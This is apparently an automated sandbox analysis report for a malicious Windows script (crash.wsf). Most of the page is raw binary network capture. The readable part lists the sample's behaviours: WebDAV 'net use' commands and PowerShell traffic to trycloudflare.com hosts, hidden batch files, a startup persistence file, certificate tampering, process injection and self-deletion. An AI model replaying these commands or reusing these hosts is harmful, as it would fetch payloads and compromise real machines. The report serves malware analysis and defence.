231213090000Z 290220140000Z0;10 UUS10U Google Trust Services10 UWR10"0 H÷ 0 Ïn6·+îFSpwî£K r¾#-ÂGÆ\ù=æî3" ÉH¸°bÎôi r}ÞÕ&ÃnÏ~× ÏÆ;£Ú:ÿlV¿ÜéaEäi¼OÉÀaDr Ð+hjbj"Wyi+â$3~vc,]¼Qi~#±ÿvñî¸Xµk5ï¡æH(91Ù§®Ï¼á°MPoLJøÛ}ñãíî1êr=Rß%d¥pªè¨¹GÈ§Z%`oBá×?çðÂF3 æKwv¡h§]ïØ(w5FäbnâªøÌï7~&³£þ0û0Uÿ0U%0++0Uÿ0ÿ0UfiIÔÞÏ$¸0n.0U#0ä¯+&q+H'/Rf,ïðq>04+(0&0$+0http://i.pki.goog/r1.crt0+U$0"0 http://c.pki.goog/r/r1.crl0U 0 0g0 H÷ Næ³ `'ùQMî¸ÁÕ"æÖßæN:;)~Þ ñâÓªD7Â¥ý7©IX1d&eµC×òìT9U:8wá³@'ÏV{T37yðäîÌQ²s!Ã?©¶Ó¤×Òák$ÛäïèTßý.¶n»Z4Pà{J¤ÓÇi9ðÊAË_È]·«o )Õ$§o#»z7÷ê<ðÀXéòH5§DÆ£Ø=¤÷°%¾÷ÿß¾§^³ØøïÅG%,>·4ÉjµPuÒêC¯MîdÒñFt~wFï´ËmÆEz6¹èü§¦z¾{ñÎÂ³ê£PUüP¯¯êÁ®ÎÎÌ«´klã½tpÌ¤úu¢üLVÝ{Ò±.Mø. ¥f« ólqÑÍx ½óÃ;Ä§B¸31åñ%'UP¾? 7ý_ô¢¥kõÏo,æÃulü¿ºä7¾9ÙçF#Üq¶ÃrFÌÑ@ûºS¨\5ä ñ!³hq·^ÛÇü@n²k;1DÚ»@/,TÝ3 ¥Î%õAåHçè@í_§×à?³iD¾äàòµhy]nxqÃuv²g0®x¶Ú3Gf0b0J w½ lÛ6ùê!ÄðXÓ 0 H÷ 0W10 UBE10U GlobalSign nv-sa10URoot CA10UGlobalSign Root CA0 200619000042Z 280128000042Z0G10 UUS1"0 U Google Trust Services LLC10UGTS Root R10"0 H÷ 0 ¶ã¡w;Ü¿>·§@<¡ýù}2qööûèÛ¼j.£Kù+ö±ùÎ±ùÅÞï¹ò£é¼^§ªR«ø#'Ë¤±cÛ×~ð ^ëh¦ôÆZG M3ãN±£ÈlKìü ßd)%#¡´Ò=.`àÏÒ »ÍHðMÂÂz»ºÏYÖ¯°°1ñÁÀß.¦mlµØ~&E=°y¤(&å¨þè<hSî:+ ²àz.uÖë§VdOh®=ÂÀ¼@À\½ö³5l¬PàLÍÓ é3¼R¯2µ)³%´HùráÊd÷æèÂú8fücùùxý{\wúvúìß±yW´½&ïÖÑë »µÅÅU«Ó¬êK)Ì¤2%NñeDÐÎªÎI´ê\|°@{çC«§l£}úL¥ÿÕÃÎKàµØ³EÏvÀí@+ýS°§Õ; ±¢Þ1Ìwêo{>Öß"æ¾úØ2ücQrÞ]Ö½)h3ï:fì&ß×Wex'Þ^I¢¨!¶©±°¥¹ ÚÇlH<@à~ ZÍV<Ñ¹ËKí9KÄ?ÒUn$°ÖqúôÁºÌíõþAØ=:È®z7£8040Uÿ0Uÿ0ÿ0Uä¯+&q+H'/Rf,ïðq>0U#0`{fE ÊP/}Í4¨ÿüýK0`+T0R0%+0http://ocsp.pki.goog/gsr10)+0http://pki.goog/gsr1/gsr1.crt02U+0)0' % #!http://crl.pki.goog/gsr1/gsr1.crl0;U 4020g0g0 +Öy0 +Öy0 H÷ 4¤±(£Ð´v¦1z!éÑR>ÈÛtA¸=5íäÿá\_«»ê\|ÏÛä ÑWò&o[¾Fh7okzÈÀ7ú%Q¬ìh¿²ÈIýZÊ#¬+ëIju×ÇÞ²ÉXHW5¡äÖýooïÏ¯ÀðõNi -áh¸Á+séÔÙü"À7fIíUgá2×Ó&¿pã=ôgm=\|å4ã2ú§njo½îKè;©³7çÃD¤~Øl×ÇFõçÕ!¾fUlÔ)² Áf[âwIH(í×3rS³5ÏbÉ$¥·9»~A¿RÏü¢¶Â?
Data received	K
Data received	GAÑçþx0Ñv)ÒÎ$\]pª¥_âG]OßêÁ£à(þi³Ê1¦¹(¿ æTî³snJº?£ÔO×·AÊfÅ\ùØLþÆ×Yù¾iTÅyËoi ánõé§6Ïx!.Y½`8ù^W·¤J]áy¬½oC4"¨T(FÕMÈgrW\~Bßd®6s&¾y? ¿29·û\|ÏE(]QnÊåeßÐÇé¬;v¼Á[db©cuäÈEÍ¸S,e¶l !Çþéþî·A,¿j")v´±£IûÁA}÷O¹S¯D#ô¶pN³\áÀW¼ßÞÈW=ËÃôF¼â¹ñÀFET®Ï@ÁAÍÛê¸¦cvZû¼ X-z
Data received
Data received
Data received
Data received
Data received	0
Data received	2¸ÛsQîrâA`+¤×&×\|Æ]\|Üzäý#1[öñ¯92º×-úË?@Æ
Data received	p
Data received	Dá`¿ÏµËÁ}ÑàÍN:.0¡ØGéÖ÷ª`ÌôÜhèËN4¥tÐj£X\P¥%áüèÿP£´SØª} «²Sñô¬ÀEW"}ÖKÓ#Õí,ë ÿýñÜ BªjN+f¹ty÷U8C<Táq#~:Ä»_3Uw"M²Íö¶ådb©ôg¬ÜÕÝæ}bÃÝRÁ,ï8 ÑiÿÝÿ_7§Íä°sµn(j®À7CnàåÓ~ã×TÄtWµ±\|?I·Ýûvù®Ot¹³Áe.JÔ"ÍËNÅø¿çA[å¶Ì'Ë`µJ\|ÈvaÈpÞ.ã çýÕ§¸'Õ&5£ï Ï¡6Ò-af µC¯Vª4Ê·Ë¶i ñé õÏpsÀCS?hÒwb¤íÈbS"}´®ç~öW·ß' g5)mk8µû`gûlÏ¹«l7Csa¼ ¦Ì-B,µS®ë@§YàfÅÜí K¿èõÙ?[qÂ3ÁØQéK¾©§³#p0Æxï Ü=Í½Vþ2ÁÁG\C[X ]Ðõ2_'È B å¾&O?J_ºÂWüºÑ&L¦Àñ¥ÉQh¯ìúßð&^ÁÖ¹ dQïZytÏ×ö«Ú0"tI[¯Dhtòj2<9ßïhu®¨éVéñÓÌ®ñ¯K¬Àå¼ùaKNÁIÛÿx¯±³=»nN^ÇîþñtC¦I@ù[k®Zú~µ²´ÿñ\|!ïèZs°Ýéä$ÍòpqÂ0´ZäÀ ¥CúqZÝµùèº®7Ð"òõI÷!Ó¥1¼Á!¢¿àï´0Ô0¨ ~ð"ìï2ë_Å$ÈíïÉ³@÷ÜR2¢ôVÙ¨ÄwÓûmäuöø_£KëyÄX$éð&¯+Û¡oßÞCK±¡ý(Õ®ÿ_Ï¤?eoìsç"ùF²]Íô¾Óâ +ZßÚ=?Ñ¯§ë¬þo«wYr.²ãîø%¶èX t¯n« Åê`·»¢ùâYÄ.Ë÷N`I2ºkH:nÐØhV£bùø@zzkbÖì/Á>$XÿS8FÙ®/{þ¼Û¶ík®ÃUJÇ' ¦r¸oÑMæê¨SQ\|Mr1Ù×²p r;°<Gø[îC?ûíB Å-@·BkÏzÙo3ùâoÝ¿¸_£×zºÒCdÔBÑxúãSÏ¨¼X¿ñ{@Sä'T«¯ñ·ÏN7éM$hÍõ6ÃA³´¡vúáób&Æ@Æ¿5k'ÁcW çÓÇ;ù÷ÌÓÞ1dYáí¬ä¦ái3BLÔ½n)³A5e Ë¾Â¤w ÿêÇ¢ ½Ù«V`"«ÞÍ¥Âb×hìÛuÎ*a$Êz aÞPót5óªaÇ©áh:âkJ~çÆsqHx(l þ¢¼·q: >\|FêGÉ9¸¦¿[·}VòðÌ#¿÷0à¥ÕÛã\|½;Rwü{2ËwSÉ«o±µD´ÄUáä=ìº½[ ±¢)¯;f<yë4»cCi¡Ér+q¿·5ÇKY@:ÐL$ÎW2ï%XZÉfð¶ÖSîÐÎò¤Tr#Ë?®"æÔ5à¡kØõ·à+5z)Ò¡)CýÏlÒÄ
Data received	TÄijÞýM~ºÅ[ Ýø´bèj½}rC\¥«Ù èÿ»KZS.ÛxùW`úD;AZÜUiÛ¿YÄ{Ø=<&6T®cëa£7/öyò/º:ÝPE8WÆ#f¾$e¥TËf~¾iþ¸¿Vûû#FQJ@)Ü³/_¦¥þòs=¸59º²ûv>Hö«KÙ´¨ìüÓàÂ¸Ü%?4$Óa dúã2A×ïÕwµ;i Bo«ÂZÁº²oÞ;-éèá@1¨þçöûà-¯#Ð£ô_ßÃØ =ÊsþðñúK2 p-m,Mf;fÇ;í¼·Ðr~o¡qOz´/ïæª©åÑfhwÍu}Â[Z¿{7T 7É§àXÜ>ðyÛþ}:Gá¢¡Çs:)ïÑ6¾¨ÈävÖz¤:±aU³Yòæ<]6lÑo ÍÿL¼K"ö`]·þcr b<v£¾sföµÑJ>áD'F¸^õ¨ïÁ×4®$\|çhüXFÝV\|úË¡!ÛmMÉ,þxí×EÚX¶lw^¯;Ýz2ôÖoN¼£´æ¬-%_¦Akô£m°Óï©Vw× 3'ÅËs~Ê)L;Þl¿¼À¤CRÆ÷wc-]ý]äwÞrW&¿Tºª]]uÍ@ô/;hXJÙ®?^Ì,qQÏlâg)!Èsù}æeáÿ(F+SyÄÝkMnúYöIðîSÍ§ÊÝqák²D.°L}m£ ÉÍ4=KéÝÝNâËÖ¯\|õ²NPP+sä7NoÆÏSç3·0ö^ré bTôÔÿtM÷Ä4,èiÛ ç.Ý´Ê¥sk ¢ÏSyFtvýÞçv ºgM8s°ë7OìÜ»¹1@dóóîü7_x>¥VÅL/2ptÜO#µLIê 2"&J"´«jÌïXÆË,¿»¾2<xöÇøÓGÉFhß:>B#ÖÒH®Ìéàéx¾x)RÞaÖxp yõèmñÃI&Â[¤NPIg J¨®ìwôøÆ^ÔKrb{ç_YÐ×\|'(ñÛ]¸vâÔ°eÔs©'âÂlns³¢¾£)éÇ@:J[åûºõØ[küjôõò4?¤@Ãqò²OÓ.ÔØhÁBÇ¶ö0 ÎKíf6ßýÞ~SÅô½×u×28eï¤`1.ÉuAf7ny¦ÁßY Ç*PÐë2:2qø9ä×Qß8xÖõkàd<ÅðïþT {ZÞÀ¢H5WØnr{5K_m¢$~ªúÒáSÕ&Nö`Æ°±@4ÔÇU~2}Y3u¾1\VÜU4èAê^aVýý "eÚ¶®s4\|Â^NÝªXp,îÔ/ÓngtâFR¯r60Ï±:¡©xTî#úSÊÁUXs0h6Uê¤#°¾§b ð±ôDuõañÑ£\|N4o¦®ÆSSÒÖ`cïy8í÷Ýòý{ÛoVCvåíÿ&¶+ø¿õs¨·çÂ§ù8£sPxÍÐiCÍ7C?~±¡ÇÚâd<µü%s{%{ÃÐV4ãÇ§º¶±nÿ£;iÒW-ÚuMþQí~mâºoå~å\ÇØ;¾"l¨[ê\|¨2e£ì.ûÐ~Xl3s!Pä
Data received	VçþSóÿ96Õþd,'°ùnÅ^LÔåuß´2~3}ãYÕßÀbu¥yîÙ½9Ñá××Õ¦å0it)ëz¢HÛß/Õ²ÈQ»zç3¯1ÏbwN!G/ÂBF¬V:Sgn/ýë=Àp¹O~ÝJÉq2,S2gò2$3u¶²TÐ{u0B\|¼Zóëû´bßaìd£ãÄO YWoy/Ý >Z«[& ¶M×¯óÚAJÕ/j£a8]öúâ#^oñ#`3´÷<Ã}¬ÜÔÒ´ÝÞÖ¢ÄÀ9õñr·ÙE¬ø}¾= õ¢"êS °;÷)Àc×g¡MÂõ¿uÊ³¾¡M³<HSWÖô0;ßs«¦5wCáÏxeÍîú\|¨~A¢N9ØR§,Åø+»èÊ"Ff$OùCIZànä<uÝ÷)4wÍ'äkHJaÓHyõ½Ð\BXUa³éápÔI`É4Vw¥þ~+1`Ï¼Ó¦¡,¦0öãÖÙãrµ·°Ðî¹k^7`á> TÁàÓÏÊËvðÀö×Á,lPlzµíÅ3-ÆÜëJjº[jR½iAÂ¦_ÔÝ:f+N.ì<ÁY"2sfë=Ðd×RÔò~~î±áTw©m Øý-sMbAúäyÌ¼éÕóg4·5]ÎPr-{0¾\©¼ÅKt#åvQiõD¼Ä©«ø ¸¹('Åq¾Ñ¹]®²öò6-ÎëáA\|¼ Ñ"\SM`aëj:\|?ûöZÙ¡åu¨©êû_µhe²YÔÜcb¶kõ¤1KaùCÊwH~ÇlH>®JPÁÂ JÕ »çªÐ±ÆCmyìÎJ([:;ï °¡ÁÞ±Û¹«f§AÎâe_ Öào~°ûZÜ9á_L,±}ëjÆ'-Øx¸ýV¶>®DLSoÚãÁÏÏ¢LóMýmDÎË&¼¯ô+Óxçi#ßäàÌ-¼9Çsù#<¬ØT!$Rèx¶~ªn×Z6ù#íE1åùvw»2]¸ !"U>ìaô$L% í"#øBZuáJ0®.rz,G¡QÌêê\|y ¤´( puÚáJâÉÉvÅ0x¬P+Ë2éÇÛÒqÖß#)3ÿôÖø°æ7© üùÿÂ¥ZcTÎ¤Ò¡ë:&:·w%tå\|9ºnrè^®U 9½ÍñÐáqrpNÊ£ª#ibÔzZºë~<¶,°Í[_/ÿ£ðÒ÷y +ÙÈUÉÇè÷èT × Gt®Ý{~ØÒr[?8Ú>`j^NÒîÐgÇB¥µùò7<ÔÇ¿Mwó+~¸i Î;ÍF`Ç¥ AÔWèaª¼SBKL×Ì<ÛñU®CÍAµû¬5¿òèjÍÑöJÎ@6Ì5¿S!Á]PªÑÞPa\|·î¤ÎRÇùo¶çÅè©Ëw®\|¤\\|Mí zÛ-_>W·X&M¥°.]ªÑ½]èÉXaeÀ©µëu,»J æMý+3ÞVÉ¡ÊÒúgkµµ=§h¦÷gåvõ²C bðû}ú"8ù8ë«,ø½vß-úçþ¯©³PÞÝ°ò65~g¦!ãe%Ü3s° <O
Data received	ð
Data received	8#ëÌÎ³õ@"üyÃlùDqßâQ0Øv Üv¤:´^ÎBPøâ §¤èæxwÿåQ©/Íù¢#ÌË¯NßÑ7¼&oÎ¡_2ýfÎòÂôëzü¶s¦ ¿ñI&ræPÝÀ+eQ©ÀËR«a7xÐ»ÁHÕëó6ò³Sâ©Hä,Àz¥7Ö«¥)¿.üüÔhÇtÐáTÿ«ûq2¬ÐÝì_?¢ßé[hEË?«vÄ!jÉ1k,»(ÍT×R£¶E«ze·LüCß±§lGÃÓôÔ9»¸"ßQ¹Q9vôþ´.0k!´¡_^ÌÈ'k§8Fßã$Ä¢øäî4$íY¾r¹J.&¸ï)Éñh¥Ë¾«À`¬UvÖ<yj+% ºX4ÌÔ¸æq×ÿÒ:m"¤ÒÉ¤OR)OÒÇúÀiëðwö´§'V`PâNË[,¦Õ«Ì±wÙg¸>IÁòèKøV]É¿×Ridf¬óÆLô0»»}ât^]ÇàMÓÿ/>æâhÑôÇhcÂÄ"b×P8ÉQNné·A};ë.åÅªÆä óåo.ÄeûÉÜ'

Poweshell is sending data to a remote host (3 events)

Data sent	hã a%¸oàJ-EÊKvOàèðÄ$q´&/5 ÀÀÀ À 28Oÿ641minutes-amazing-curriculum-maui.trycloudflare.com
Data sent	FBAÊ\|®;c~¢]¶8C0YÌìvìYA/$Å)\|ïåî¢®Ãù'ÕÖµÑklwïîgÞ èýÙÄ0¦ïR0Ø·¾Cr¡:ÎµÂUMÍJõÜñßs¸eTn9¼®¸ý l
Data sent	ÓÛß»ÛÃ¥ím/N¤[Í¨Æ)¹gº¿I!Oæì0Ä]7@Hw7àW¬¿ÐÃÆÛ^×u¨XvÈ4H5NÜ<ú½xAWâ-±ÑÈ9%½ ÊOuOOþz°ßýû?3Ú&ý»K;l !è2ðÓg,ÕÑßHø)d Ô$:

Checks for the Locally Unique Identifier on the system for a suspicious privilege (6 events)

Time & API	Arguments	Status	Return
LookupPrivilegeValueW May 4, 2025, 12:46 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW May 4, 2025, 12:46 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW May 4, 2025, 12:46 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW May 4, 2025, 12:46 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW May 4, 2025, 12:46 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW May 4, 2025, 12:46 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1

Yara rule detected in process memory (8 events)

description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep

Uses Windows utilities for basic Windows functionality (11 events)

cmdline	C:\Users\test22\AppData\Local\Temp\batchcache\curl.bat hidden
cmdline	cmd /c net use Z: /delete /y
cmdline	"C:\Windows\System32\cmd.exe" /c net use Z: "\\minutes-amazing-curriculum-maui.trycloudflare.com@SSL\DavWWWRoot"
cmdline	net use "\\travel-sagem-distant-potential.trycloudflare.com@SSL\DavWWWRoot"
cmdline	"C:\Windows\System32\cmd.exe" /c net use Z: /delete /y
cmdline	net use Z: "\\minutes-amazing-curriculum-maui.trycloudflare.com@SSL\DavWWWRoot"
cmdline	"C:\Program Files (x86)\Internet Explorer\iexplore.exe" -nohome
cmdline	net use Z: /delete /y
cmdline	net use W: "\\lu-phys-peru-goes.trycloudflare.com@SSL\DavWWWRoot"
cmdline	"C:\Program Files (x86)\Internet Explorer\iexplore.exe" SCODEF:3012 CREDAT:145409
cmdline	cmd /c net use Z: "\\minutes-amazing-curriculum-maui.trycloudflare.com@SSL\DavWWWRoot"

Installs itself for autorun at Windows startup (1 event)

file	C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.bat

A potential heapspray has been detected. 55 megabytes was sprayed onto the heap of the powershell.exe process (1 event)

count

889

name

heapspray

process

powershell.exe

total_mb

length

65536

protection

PAGE_READWRITE

Attempts to create or modify system certificates (1 event)

registry

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F81F111D0E5AB58D396F7BF525577FD30FDC95AA\Blob

Network communications indicative of a potential document or script payload download was initiated by the process powershell.exe (3 events)

Time & API	Arguments	Status	Return
send May 4, 2025, 12:46 p.m.	buffer: hã a%¸oàJ-EÊKvOàèðÄ$q´&/5 ÀÀÀ À 28Oÿ641minutes-amazing-curriculum-maui.trycloudflare.com socket: 1420 sent: 153	1	153
send May 4, 2025, 12:46 p.m.	buffer: FBAÊ\|®;c~¢]¶8C0YÌìvìYA/$Å)\|ïåî¢®Ãù'ÕÖµÑklwïîgÞ èýÙÄ0¦ïR0Ø·¾Cr¡:ÎµÂUMÍJõÜñßs¸eTn9¼®¸ý l socket: 1420 sent: 134	1	134
send May 4, 2025, 12:46 p.m.	buffer: ÓÛß»ÛÃ¥ím/N¤[Í¨Æ)¹gº¿I!Oæì0Ä]7@Hw7àW¬¿ÐÃÆÛ^×u¨XvÈ4H5NÜ<ú½xAWâ-±ÑÈ9%½ ÊOuOOþz°ßýû?3Ú&ý»K;l !è2ðÓg,ÕÑßHø)d Ô$: socket: 1420 sent: 149	1	149

One or more non-whitelisted processes were created (14 events)

parent_process	wscript.exe	martian_process	"C:\Windows\System32\cmd.exe" /c "C:\Users\test22\AppData\Local\Temp\batchcache\tre.bat"
parent_process	wscript.exe	martian_process	"C:\Windows\System32\cmd.exe" /c net use Z: /delete /y
parent_process	wscript.exe	martian_process	"C:\Windows\System32\cmd.exe" /c "C:\Users\test22\AppData\Local\Temp\batchcache\curl.bat"
parent_process	wscript.exe	martian_process	cmd /c net use Z: /delete /y
parent_process	wscript.exe	martian_process	"C:\Windows\System32\cmd.exe" /c net use Z: "\\minutes-amazing-curriculum-maui.trycloudflare.com@SSL\DavWWWRoot"
parent_process	wscript.exe	martian_process	"C:\Windows\System32\cmd.exe" /c "C:\Users\test22\AppData\Local\Temp\batchcache\de.bat"
parent_process	wscript.exe	martian_process	cmd /c "C:\Users\test22\AppData\Local\Temp\batchcache\de.bat"
parent_process	wscript.exe	martian_process	cmd /c "C:\Users\test22\AppData\Local\Temp\batchcache\tre.bat"
parent_process	wscript.exe	martian_process	cmd /c net use Z: "\\minutes-amazing-curriculum-maui.trycloudflare.com@SSL\DavWWWRoot"
parent_process	wscript.exe	martian_process	cmd /c "C:\Users\test22\AppData\Local\Temp\batchcache\curl.bat"
parent_process	powershell.exe	martian_process	C:\Users\test22\AppData\Local\Temp\batchcache\curl.bat hidden
parent_process	powershell.exe	martian_process	"C:\Users\test22\AppData\Local\Temp\batchcache\curl.bat" hidden
parent_process	powershell.exe	martian_process	C:\Windows\System32\cmd.exe /c "C:\Users\test22\AppData\Local\Temp\batchcache\tre.bat" hidden
parent_process	powershell.exe	martian_process	"C:\Windows\system32\cmd.exe" /c "C:\Users\test22\AppData\Local\Temp\batchcache\tre.bat" hidden

Resumed a suspended thread in a remote process potentially indicative of process injection (2 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 3012 resumed a thread in remote process 1680
NtResumeThread May 4, 2025, 12:46 p.m.	thread_handle: 0x00000340 suspend_count: 1 process_identifier: 1680	1	0	0

Creates and runs a batch file to remove the original binary (1 event)

file	1ac0249a4c6ed5f3_update.bat

Creates a suspicious Powershell process (3 events)

value	Uses powershell to execute a file download from the command line
option	-windowstyle hidden	value	Attempts to execute command with a hidden window
option	-windowstyle hidden	value	Attempts to execute command with a hidden window

The process wscript.exe wrote an executable file to disk which it then attempted to execute (1 event)

file	C:\Windows\System32\cmd.exe

crash.wsf

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All